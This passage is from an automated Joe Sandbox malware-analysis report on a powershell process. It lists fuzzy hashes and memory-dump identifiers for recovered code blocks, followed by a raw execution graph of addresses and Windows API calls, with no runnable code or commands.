                                                            • Instruction ID: 56f8b3702d97c344a21ccd15602be341ccca8b4ab5314757b5d01aa057e48b92
                                                            • Opcode Fuzzy Hash: fa1a9a5b28c98c876506d10409173c52b029b388c94542a313fa8ee386da2284
                                                            • Instruction Fuzzy Hash: DD41C531A0C78C4EEB19DBACD84A7E97BF0EB96331F04816BD089C3192D6756456CB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1759084209.00007FFD9B2ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B2ED000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_7ffd9b2ed000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7f5ba3b8a711680477c44428bad65151c6c2725616a386bfe5bf0cbcd4484b27
                                                            • Instruction ID: d40e2261dab76e8b0c364b109704799c8cd81dec43ac4261af9e9cead817d72b
                                                            • Opcode Fuzzy Hash: 7f5ba3b8a711680477c44428bad65151c6c2725616a386bfe5bf0cbcd4484b27
                                                            • Instruction Fuzzy Hash: BD41487140EBC84FE7A69B3998519A23FF0FF52220B0601DFD089CB1A7D625A846C792
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1759675568.00007FFD9B400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B400000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_7ffd9b400000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 81c61e88a0d68af76f090f0724f1202307844701a6abad6c046fc66d22fdaf95
                                                            • Instruction ID: c0ab337c05d15fb90536a3ed6247bcdb2198915395e49450be2f86cccddc5c12
                                                            • Opcode Fuzzy Hash: 81c61e88a0d68af76f090f0724f1202307844701a6abad6c046fc66d22fdaf95
                                                            • Instruction Fuzzy Hash: F4219D32B1CA4D0FEBA8DB6C94956F477D1EFA5325F0402BBC05CC32E2DA55A8138B80
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1759675568.00007FFD9B400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B400000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_7ffd9b400000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 952aa5b9115fc0b5a3a9e360038a49706df948729446d2f01274d0907e9328aa
                                                            • Instruction ID: c7e5d8f2e62c2b90643ed55992d06f9dcb5d3146dfde35b57b1d3c717291c7e7
                                                            • Opcode Fuzzy Hash: 952aa5b9115fc0b5a3a9e360038a49706df948729446d2f01274d0907e9328aa
                                                            • Instruction Fuzzy Hash: 8E21CE62A0E7CA4FE7628BACD8260E53FB0DF57224B0A01FBD4C5871A3D50A68469B51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1760094365.00007FFD9B4D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B4D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_7ffd9b4d0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9f77dfbeabed2ce800872a33bf4d1830ea0672ec6fdc7956d3e185c7ea7f27e7
                                                            • Instruction ID: f80e725e42908c2120f7fd0a40783fbd5bac0019113d0a2e873afb24b463a692
                                                            • Opcode Fuzzy Hash: 9f77dfbeabed2ce800872a33bf4d1830ea0672ec6fdc7956d3e185c7ea7f27e7
                                                            • Instruction Fuzzy Hash: 39110232B4F9490FEBB8DB6C94745B877D1EF8032874A02BEE05DC70A2DA18BD409380
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1759675568.00007FFD9B400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B400000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_7ffd9b400000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                            • Instruction ID: 756be3dec80222bb223b3a781116992aa564b27880e7e8b88c63464b91de19fa
                                                            • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                            • Instruction Fuzzy Hash: 3701A77021CB0C8FD748EF4CE051AA9B7E0FB99324F10056DE58AC36A1D636E881CB41
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1759675568.00007FFD9B400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B400000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_7ffd9b400000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 50f7aefedb20850458a8ec40a2e91353b0bb45a38ca20b36624a12739faa8189
                                                            • Instruction ID: 575e94ce787cfe65abc3d4da6da94dc5f50734f4bff9cb52d9d5f4bd23454b80
                                                            • Opcode Fuzzy Hash: 50f7aefedb20850458a8ec40a2e91353b0bb45a38ca20b36624a12739faa8189
                                                            • Instruction Fuzzy Hash: 64F0303276C6044FDB4CAA1CF8529B573E1E799334B10026EE48BC3696D927E8438685
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1759675568.00007FFD9B400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B400000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_7ffd9b400000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 78802729be72fc44c00077502d6d068842fc57a9b6f2a443d5e148e867e7550c
                                                            • Instruction ID: 5d31327386d60e6837800d56b1540041a5a4bd261ef4269e510c0603527517ca
                                                            • Opcode Fuzzy Hash: 78802729be72fc44c00077502d6d068842fc57a9b6f2a443d5e148e867e7550c
                                                            • Instruction Fuzzy Hash: 4BF0653276C6088FDB5CAA5CF8529B573E1EB99324B10017EF48BC3697D927F842C685
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1760094365.00007FFD9B4D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B4D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_7ffd9b4d0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 51d0a868f22b663a4de551d96ded6127b3ca00e5663dc7071333f31ab7a2efc9
                                                            • Instruction ID: 9210442c24f2c4a37df8bb9d9470485e089250729a56e651937f19ac33ec4a69
                                                            • Opcode Fuzzy Hash: 51d0a868f22b663a4de551d96ded6127b3ca00e5663dc7071333f31ab7a2efc9
                                                            • Instruction Fuzzy Hash: 4BF0F032B0D9498FD769EB4CE4558A833E0EF94324B1201BAE05DC70A7DA26FC41C780
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1760094365.00007FFD9B4D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B4D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_7ffd9b4d0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                            • Instruction ID: 8f6b129acf456c359a7b59d9c53de0948d8b78166bef4011fc7b668e41017483
                                                            • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                            • Instruction Fuzzy Hash: B0E0E531B0C8089FDAB8DA4CE0559A973E1EB9833571202AAD14EC7561CA22FD519B80
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1759675568.00007FFD9B400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B400000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_7ffd9b400000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 74b27c37c14e3b07a638b4e63e7a12c1ce4d1d8ccd211bd2c090ba7b47c205eb
                                                            • Instruction ID: 491d427ff7db277153eba635b69f994fa5da572e386672387b223253d44b4605
                                                            • Opcode Fuzzy Hash: 74b27c37c14e3b07a638b4e63e7a12c1ce4d1d8ccd211bd2c090ba7b47c205eb
                                                            • Instruction Fuzzy Hash: 6CE09271804A8C8FCB55DF18C4594E97FE0FF68300B05019AE84DC7121D7709554CBC1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1759675568.00007FFD9B400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B400000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_7ffd9b400000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: L
                                                            • API String ID: 0-2909332022
                                                            • Opcode ID: 3e86be8bcfdf5df26ef219d150505b82161ddd6dbe343edb81e72d1f1a744ee3
                                                            • Instruction ID: bb74b4a7dcb68676a63c96e4abe0cad99bfb94c40b38b3ed65b311d625263eb1
                                                            • Opcode Fuzzy Hash: 3e86be8bcfdf5df26ef219d150505b82161ddd6dbe343edb81e72d1f1a744ee3
                                                            • Instruction Fuzzy Hash: 7991E507B1A56201E30573FEB8664FD7F61EFC2276B0843B7D29D8A0D78C5910CA82E6
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1760094365.00007FFD9B4D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B4D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_7ffd9b4d0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: bc34c5be49a89de18fb935f718241ef05b72331c55359975ddc288b84281ac70
                                                            • Instruction ID: dca79f88cb7b4d5dc12762c1664cef39eed1b3840a0b4a972db98daa9be27415
                                                            • Opcode Fuzzy Hash: bc34c5be49a89de18fb935f718241ef05b72331c55359975ddc288b84281ac70
                                                            • Instruction Fuzzy Hash: 62525762B0EA8D0FE7A687AC58645B47BD1EFD6224B0A02FBD04DC71E3DD18BD069741
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1759675568.00007FFD9B400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B400000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_7ffd9b400000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: L_^$L_^$L_^$L_^$L_^$L_^
                                                            • API String ID: 0-2894164595
                                                            • Opcode ID: 14561a7493f1c413a62b111d9a24e5bea34841ccaa2e8b9e2b2bfba1cb4fe508
                                                            • Instruction ID: b71d03019de3cc3867a6312fa587129b317f306b6cd8dc6920d646cabb92d39f
                                                            • Opcode Fuzzy Hash: 14561a7493f1c413a62b111d9a24e5bea34841ccaa2e8b9e2b2bfba1cb4fe508
                                                            • Instruction Fuzzy Hash: 35918053B1F6D61BEB6256B98C764E93FB0EF5235870E01F7C4E88B0A3ED1825069216
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Execution Graph

                                                            Execution Coverage:3.2%
                                                            Dynamic/Decrypted Code Coverage:0%
                                                            Signature Coverage:0.8%
                                                            Total number of Nodes:877
                                                            Total number of Limit Nodes:25
7ff7bad61379 60833->60836 60834->60762 60835->60833 60845 7ff7bad4506c 16 API calls _cwprintf_s_l 60836->60845 60840 7ff7bad6139f VirtualProtect 60839->60840 60842 7ff7bad613bf 60839->60842 60841 7ff7bad613d0 60840->60841 60840->60842 60846 7ff7bad613dc 16 API calls _cwprintf_s_l 60841->60846 60842->60762 60861 7ff7bad61140 60849->60861 60851 7ff7bad716af pre_c_initialization 60852->60744 60854 7ff7bad41774 60853->60854 60858 7ff7bad41691 _cwprintf_s_l 60853->60858 60859 7ff7bad4172d _cwprintf_s_l 60854->60859 60881 7ff7bad3c940 16 API calls _cwprintf_s_l 60854->60881 60858->60859 60876 7ff7bad41328 60858->60876 60859->60746 60860->60742 60862 7ff7bad6118a 60861->60862 60863 7ff7bad61155 60861->60863 60866 7ff7bad611bd 60862->60866 60867 7ff7bad611a5 60862->60867 60864 7ff7bad6115e 60863->60864 60865 7ff7bad6116a VirtualProtect 60863->60865 60868 7ff7bad61388 17 API calls 60864->60868 60869 7ff7bad611ea 60865->60869 60873 7ff7bad61168 60865->60873 60866->60866 60871 7ff7bad611d2 VirtualProtect 60866->60871 60870 7ff7bad61388 17 API calls 60867->60870 60868->60873 60875 7ff7bad613dc 16 API calls _cwprintf_s_l 60869->60875 60870->60873 60871->60869 60871->60873 60873->60851 60877 7ff7bad41064 _cwprintf_s_l 16 API calls 60876->60877 60878 7ff7bad4136c _cwprintf_s_l memcpy_s 60877->60878 60879 7ff7bad41446 60878->60879 60882 7ff7bad418bc 60878->60882 60879->60859 60883 7ff7bad418f0 60882->60883 60885 7ff7bad41912 _cwprintf_s_l __scrt_fastfail 60882->60885 60884 7ff7bad41064 _cwprintf_s_l 16 API calls 60883->60884 60883->60885 60884->60885 60885->60879 60889 7ff7bad47f18 60886->60889 60887 7ff7bad47fb5 60887->60698 60889->60887 60910 7ff7bad3cb3c 16 API calls _cwprintf_s_l 60889->60910 60890 7ff7bad47feb 60911 7ff7bad3cb7c 16 API calls 2 library calls 60890->60911 60892 7ff7bad48008 60894 7ff7bad4d112 60893->60894 60897 7ff7bad4d11a 60893->60897 60918 7ff7bad4ccbc 60894->60918 60896 7ff7bad4d2a6 60896->60704 60897->60896 60899 7ff7bad4d19f 60897->60899 60925 
7ff7bad5caa4 16 API calls _cwprintf_s_l 60897->60925 60900 7ff7bad4d1b6 _cwprintf_s_l 60899->60900 60901 7ff7bad4ccbc 55 API calls 60899->60901 60902 7ff7bad41658 _cwprintf_s_l 16 API calls 60900->60902 60901->60900 60905 7ff7bad4d204 60902->60905 60903 7ff7bad4ccbc 55 API calls 60903->60905 60905->60896 60905->60903 60912 7ff7bad4d31c 60905->60912 60906->60704 60907->60708 60908->60707 60909->60710 60910->60890 60911->60892 60914 7ff7bad4d387 60912->60914 60926 7ff7bad41000 60914->60926 60916 7ff7bad4d40d _cwprintf_s_l memcpy_s 60932 7ff7bad4ce48 16 API calls _cwprintf_s_l 60916->60932 60917 7ff7bad4d550 _cwprintf_s_l memcpy_s 60917->60905 60919 7ff7bad4ce25 60918->60919 60923 7ff7bad4cce6 memcpy_s 60918->60923 60939 7ff7bad3c8c0 16 API calls _cwprintf_s_l 60919->60939 60921 7ff7bad52020 16 API calls 60921->60923 60922 7ff7bad4ce03 60922->60897 60923->60919 60923->60921 60923->60922 60934 7ff7bad3de34 60923->60934 60925->60899 60931 7ff7bad48ccc 6 API calls 60926->60931 60927 7ff7bad41027 60928 7ff7bad4102f 60927->60928 60933 7ff7bad3c8c0 16 API calls _cwprintf_s_l 60927->60933 60928->60916 60931->60927 60932->60917 60940 7ff7bada9c4c 60934->60940 60937 7ff7bad3de5d 60937->60923 60941 7ff7bada9c55 60940->60941 60942 7ff7bad3de57 60940->60942 60943 7ff7bada9b44 _get_daylight 14 API calls 60941->60943 60942->60937 60946 7ff7bada9ffc 60942->60946 60944 7ff7bada9c5a 60943->60944 60949 7ff7badb7070 23 API calls _invalid_parameter_noinfo 60944->60949 60950 7ff7badaa01c 60946->60950 60949->60942 60951 7ff7badaa046 60950->60951 60962 7ff7badaa014 60950->60962 60952 7ff7badaa092 60951->60952 60954 7ff7badaa055 __scrt_fastfail 60951->60954 60951->60962 60963 7ff7bad902f0 EnterCriticalSection 60952->60963 60956 7ff7bada9b44 _get_daylight 14 API calls 60954->60956 60955 7ff7badaa09a 60957 7ff7bada9d6c _fread_nolock 37 API calls 60955->60957 60958 7ff7badaa06a 60956->60958 60959 7ff7badaa0b1 60957->60959 60964 7ff7badb7070 23 API calls _invalid_parameter_noinfo 60958->60964 
60961 7ff7bad902fc _fread_nolock LeaveCriticalSection 60959->60961 60961->60962 60962->60937 60964->60962 60965->60632 60966->60632 60968 7ff7bad32c6e 60969 7ff7bad32e9e 60968->60969 60970 7ff7bad32ca4 60968->60970 60971 7ff7bad39c4c 16 API calls 60969->60971 60991 7ff7bad5af30 60970->60991 61031 7ff7bad38424 60970->61031 60973 7ff7bad32ed0 60971->60973 60972 7ff7bad32cb0 60975 7ff7bad32dd7 60972->60975 60976 7ff7bad33098 60972->60976 60980 7ff7bad32d98 60972->60980 60983 7ff7bad3273d 60972->60983 60974 7ff7bad3cf04 97 API calls 60973->60974 60977 7ff7bad34ac4 60974->60977 60986 7ff7bad34941 60976->60986 61091 7ff7bad5fafc 18 API calls 60976->61091 60979 7ff7bad35066 60980->60975 60981 7ff7bad39c4c 16 API calls 60980->60981 60981->60980 60982 7ff7bad39c4c 16 API calls 60982->60976 60983->60983 60984 7ff7bad33d79 60983->60984 60988 7ff7bad39c4c 16 API calls 60983->60988 61089 7ff7bad32420 18 API calls 60983->61089 61090 7ff7bad538ec 16 API calls _cwprintf_s_l 60983->61090 60984->60976 60984->60982 60988->60983 61092 7ff7bad5c618 60991->61092 60993 7ff7bad5af63 60997 7ff7bad5afd8 60993->60997 61107 7ff7bad5c714 18 API calls 60993->61107 60995 7ff7bad5b129 61104 7ff7bad3c5ac 60995->61104 60996 7ff7bad5aff9 61108 7ff7bad5d31c 16 API calls 60996->61108 60997->60995 60997->60996 61000 7ff7bad5b009 61109 7ff7bad73d40 18 API calls __scrt_fastfail 61000->61109 61001 7ff7bad5b13c 61003 7ff7bad5c5d0 16 API calls 61001->61003 61004 7ff7bad5b175 61003->61004 61005 7ff7bad7b0e4 19 API calls 61004->61005 61008 7ff7bad5b183 61004->61008 61005->61008 61006 7ff7bad5b10d 61006->60972 61009 7ff7bad5b1f1 61008->61009 61011 7ff7bad5b220 61008->61011 61012 7ff7bad5b200 61008->61012 61009->60972 61010 7ff7bad5b048 61019 7ff7bad5b0cc 61010->61019 61110 7ff7bad42574 16 API calls _cwprintf_s_l 61010->61110 61014 7ff7bad44c60 16 API calls 61011->61014 61013 7ff7bad5af30 92 API calls 61012->61013 61013->61009 61015 7ff7bad5b22a 61014->61015 61016 7ff7bad3c798 16 API calls 61015->61016 61018 
7ff7bad5b23b 61016->61018 61020 7ff7bad5c5d0 16 API calls 61018->61020 61019->61006 61111 7ff7bad40e08 16 API calls 61019->61111 61022 7ff7bad5b261 61020->61022 61021 7ff7bad44c60 16 API calls 61023 7ff7bad5b28f 61021->61023 61025 7ff7bad5b2a1 61022->61025 61026 7ff7bad5b384 61022->61026 61029 7ff7bad5b278 61022->61029 61024 7ff7bad4b614 _cwprintf_s_l 16 API calls 61023->61024 61024->61025 61028 7ff7bad40e08 16 API calls 61025->61028 61030 7ff7bad5b2b7 61025->61030 61027 7ff7bad44dfc 16 API calls 61026->61027 61027->61025 61028->61030 61029->61021 61029->61030 61030->60972 61040 7ff7bad38453 pre_c_initialization 61031->61040 61032 7ff7bad38513 vwscanf_s 61133 7ff7bada908c 57 API calls 3 library calls 61032->61133 61033 7ff7bad3859d 61116 7ff7bad3ac38 61033->61116 61035 7ff7bad38570 61035->61033 61137 7ff7bad3baf0 61035->61137 61038 7ff7bad38529 vwscanf_s 61134 7ff7bada908c 57 API calls 3 library calls 61038->61134 61040->61032 61040->61035 61042 7ff7bad385b2 61043 7ff7bad3ac38 16 API calls 61042->61043 61045 7ff7bad385c1 61043->61045 61047 7ff7bad3abc4 16 API calls 61045->61047 61046 7ff7bad3853f vwscanf_s 61135 7ff7bada908c 57 API calls 3 library calls 61046->61135 61053 7ff7bad385d7 61047->61053 61048 7ff7bad38613 61049 7ff7bad3baf0 16 API calls 61048->61049 61056 7ff7bad38632 61049->61056 61051 7ff7bad38555 vwscanf_s 61136 7ff7bada8d0c 56 API calls 61051->61136 61052 7ff7bad3b754 16 API calls 61052->61053 61053->61048 61053->61052 61055 7ff7bad3b978 16 API calls 61053->61055 61054 7ff7bad386bf 61058 7ff7bad38b08 93 API calls 61054->61058 61055->61053 61059 7ff7bad38648 vwscanf_s 61056->61059 61062 7ff7bad38658 61056->61062 61063 7ff7bad38685 61056->61063 61061 7ff7bad386cd 61058->61061 61059->61054 61060 7ff7bad38564 61059->61060 61064 7ff7bada908c 57 API calls 61059->61064 61060->60972 61061->61060 61067 7ff7bad38074 113 API calls 61061->61067 61073 7ff7bad386fb vwscanf_s 61061->61073 61066 7ff7bad3dc34 111 API calls 61062->61066 61065 7ff7bad37be8 91 API calls 
61063->61065 61064->61054 61065->61059 61069 7ff7bad38661 61066->61069 61067->61073 61068 7ff7bad3874f 61070 7ff7bad387a4 73 API calls 61068->61070 61071 7ff7bad38672 61069->61071 61074 7ff7bad37a40 33 API calls 61069->61074 61072 7ff7bad38757 61070->61072 61075 7ff7bad38aac 76 API calls 61071->61075 61076 7ff7bad37c50 100 API calls 61072->61076 61073->61060 61073->61068 61077 7ff7bada8e48 _fread_nolock 23 API calls 61073->61077 61074->61071 61075->61059 61076->61060 61078 7ff7bad3872d 61077->61078 61079 7ff7bada9194 _fread_nolock 23 API calls 61078->61079 61080 7ff7bad38734 61079->61080 61081 7ff7bad38738 vwscanf_s 61080->61081 61082 7ff7bad38761 61080->61082 61085 7ff7bada908c 57 API calls 61081->61085 61083 7ff7bad3dc34 111 API calls 61082->61083 61084 7ff7bad3876b 61083->61084 61086 7ff7bad3877c 61084->61086 61087 7ff7bad37a40 33 API calls 61084->61087 61085->61068 61088 7ff7bad38aac 76 API calls 61086->61088 61087->61086 61088->61060 61090->60983 61091->60979 61093 7ff7bad5c6ad 61092->61093 61094 7ff7bad5c646 61092->61094 61100 7ff7bad5c6b2 61093->61100 61113 7ff7bad3c5d8 16 API calls _cwprintf_s_l 61093->61113 61094->61093 61096 7ff7bad5c655 61094->61096 61112 7ff7bad7a930 89 API calls 2 library calls 61096->61112 61097 7ff7bad5c68c 61103 7ff7bad5c690 __FrameHandler3::UnwindNestedFrames 61097->61103 61114 7ff7bad3cb7c 16 API calls 2 library calls 61097->61114 61101 7ff7bad3c5ac 16 API calls 61100->61101 61100->61103 61102 7ff7bad5c711 61101->61102 61103->60993 61115 7ff7bad3c0ac 16 API calls _cwprintf_s_l 61104->61115 61107->60997 61108->61000 61109->61010 61110->61019 61111->61006 61112->61097 61114->61100 61117 7ff7bad3ac58 61116->61117 61121 7ff7bad385aa 61116->61121 61118 7ff7bad3ad17 61117->61118 61120 7ff7bad3ac6a 61117->61120 61117->61121 61144 7ff7bad40c94 16 API calls 61118->61144 61120->61121 61143 7ff7bad40e08 16 API calls 61120->61143 61123 7ff7bad3fb78 61121->61123 61126 7ff7bad3fb93 61123->61126 61127 7ff7bad3fbc8 61126->61127 61145 7ff7bad3b4f4 
61126->61145 61151 7ff7bad3b754 16 API calls _cwprintf_s_l 61126->61151 61152 7ff7bad3e170 16 API calls 2 library calls 61127->61152 61129 7ff7bad3b4f4 16 API calls 61131 7ff7bad3fbe0 61129->61131 61130 7ff7bad3baf0 16 API calls 61130->61131 61131->61129 61131->61130 61132 7ff7bad3fc19 61131->61132 61133->61038 61134->61046 61135->61051 61136->61060 61138 7ff7bad3bb0a _cwprintf_s_l 61137->61138 61139 7ff7bad41658 _cwprintf_s_l 16 API calls 61138->61139 61140 7ff7bad3bb23 61139->61140 61157 7ff7bad43c80 61140->61157 61142 7ff7bad3bb45 61142->61033 61143->61120 61144->61121 61146 7ff7bad3b51a 61145->61146 61147 7ff7bad3b51f 61145->61147 61156 7ff7bad40e08 16 API calls 61146->61156 61153 7ff7bad42cf0 61147->61153 61150 7ff7bad3b54e 61150->61126 61151->61126 61152->61131 61154 7ff7bad41000 16 API calls 61153->61154 61155 7ff7bad42d14 61154->61155 61155->61150 61156->61147 61162 7ff7bad43ca7 61157->61162 61158 7ff7bad43e1a 61174 7ff7bad3c94c 16 API calls _cwprintf_s_l 61158->61174 61160 7ff7bad43d56 61163 7ff7bad43dbd 61160->61163 61165 7ff7bad43e39 61160->61165 61168 7ff7bad43d92 61160->61168 61161 7ff7bad43e2b 61175 7ff7bad3c940 16 API calls _cwprintf_s_l 61161->61175 61162->61158 61162->61160 61162->61161 61162->61163 61163->61142 61176 7ff7bad3c940 16 API calls _cwprintf_s_l 61165->61176 61166 7ff7bad43daf 61173 7ff7bad420f8 16 API calls 61166->61173 61168->61166 61169 7ff7bad43e47 61168->61169 61177 7ff7bad3c940 16 API calls _cwprintf_s_l 61169->61177 61173->61163 61178 7ff7badb5114 61179 7ff7badb5124 61178->61179 61180 7ff7badb512d 61178->61180 61179->61180 61184 7ff7badb4e50 61179->61184 61185 7ff7badb4e65 61184->61185 61186 7ff7badb4e69 61184->61186 61185->61180 61196 7ff7badb5008 15 API calls 3 library calls 61185->61196 61197 7ff7badc4e18 61186->61197 61191 7ff7badb4e7b 61217 7ff7badb76b0 14 API calls 2 library calls 61191->61217 61194 7ff7badb4e88 61216 7ff7badb76b0 14 API calls 2 library calls 61194->61216 61196->61180 61198 7ff7badb4e6e 61197->61198 61199 
7ff7badc4e25 61197->61199 61203 7ff7badc51dc GetEnvironmentStringsW 61198->61203 61218 7ff7badb91cc 61199->61218 61204 7ff7badc520a 61203->61204 61205 7ff7badc52ac 61203->61205 61208 7ff7badc14cc wcsftime WideCharToMultiByte 61204->61208 61206 7ff7badb4e73 61205->61206 61207 7ff7badc52b6 FreeEnvironmentStringsW 61205->61207 61206->61191 61215 7ff7badb4ebc 23 API calls 4 library calls 61206->61215 61207->61206 61209 7ff7badc525c 61208->61209 61209->61205 61210 7ff7badb89e8 wcsftime 15 API calls 61209->61210 61211 7ff7badc526b 61210->61211 61212 7ff7badc5295 61211->61212 61213 7ff7badc14cc wcsftime WideCharToMultiByte 61211->61213 61449 7ff7badb76b0 14 API calls 2 library calls 61212->61449 61213->61212 61215->61194 61216->61191 61217->61185 61219 7ff7badb91dd 61218->61219 61222 7ff7badb91e2 61218->61222 61261 7ff7badb7bfc 6 API calls try_get_function 61219->61261 61224 7ff7badb91ea 61222->61224 61262 7ff7badb7c44 6 API calls try_get_function 61222->61262 61223 7ff7badb9201 61223->61224 61226 7ff7badb7638 pre_c_initialization 14 API calls 61223->61226 61231 7ff7badb9264 61224->61231 61269 7ff7badb6d78 61224->61269 61228 7ff7badb9214 61226->61228 61229 7ff7badb9232 61228->61229 61230 7ff7badb9222 61228->61230 61265 7ff7badb7c44 6 API calls try_get_function 61229->61265 61263 7ff7badb7c44 6 API calls try_get_function 61230->61263 61243 7ff7badc4b9c 61231->61243 61234 7ff7badb9229 61264 7ff7badb76b0 14 API calls 2 library calls 61234->61264 61235 7ff7badb923a 61236 7ff7badb9250 61235->61236 61237 7ff7badb923e 61235->61237 61267 7ff7badb8ea8 14 API calls _invalid_parameter_noinfo 61236->61267 61266 7ff7badb7c44 6 API calls try_get_function 61237->61266 61241 7ff7badb9258 61268 7ff7badb76b0 14 API calls 2 library calls 61241->61268 61281 7ff7badc4d60 61243->61281 61245 7ff7badc4bc5 61296 7ff7badc48a8 61245->61296 61248 7ff7badc4bdf 61248->61198 61250 7ff7badc4c8b 61319 7ff7badb76b0 14 API calls 2 library calls 61250->61319 61254 7ff7badc4c7f 61255 7ff7badc4c86 
